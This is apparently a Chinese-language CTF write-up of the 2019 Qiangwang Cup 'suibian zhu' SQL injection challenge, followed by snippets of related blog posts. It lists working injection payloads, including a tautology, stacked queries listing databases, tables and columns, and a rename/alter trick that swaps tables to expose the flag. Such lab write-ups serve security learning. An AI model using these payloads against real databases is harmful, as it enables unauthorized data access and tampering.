首先用1' or 1=1# 提交,可以把表中資料都查詢出來,但沒有我們需要的東西。
想嘗試用聯合查詢1' union select 1,2
發現被過濾了很多。
然後查詢資料庫1';show databases;#
然後查詢表1';show tables;#
查詢words中的列1';show columns from words;#
發現words中有 id 和 data,查詢1919810931114514表中所有列(字串為表名操作時要加反單引號)
發現flag
這道題沒有禁用rename和alter,所以我們可以採用修改表結構的方法來得到flag將words表名改為words1,再將數字名錶改為words,這樣數字名錶就是預設查詢的表了,但是它少了乙個id列,可以將flag欄位改為id,或者新增id欄位
表已經被改變
再開始剛才的操作,就能查到了
2019強網杯小記
好久沒打過ctf了,這次打完了才意識到這次比賽的很多題其實都是一些原題或者原題變種或者拼湊起來,但奈何太久沒做過ctf了,跟不上了,太菜了qaq web6 首先掃一下目錄,存在ds store資訊洩露和一些路徑 訪問api目錄,提示post引數filename 並提供乙個array,使用postma...
強網杯 2019 隨便注
1 or 1 1 回顯了所有使用者資訊 union select 1,2 得到回顯 return preg match select update delete drop insert where i inject 過濾了 select update delete drop insert where...
強網杯 2019 隨便注
知識點 原理參考堆疊注入詳解 開啟題目,如圖所示 嘗試 1 union select 1,2 發現select被禁 嘗試堆疊注入 查庫 查表 查1919810931114514表的列名 1 show columns from 1919810931114514 這裡表名使用反引號進行包含 應該就是從1...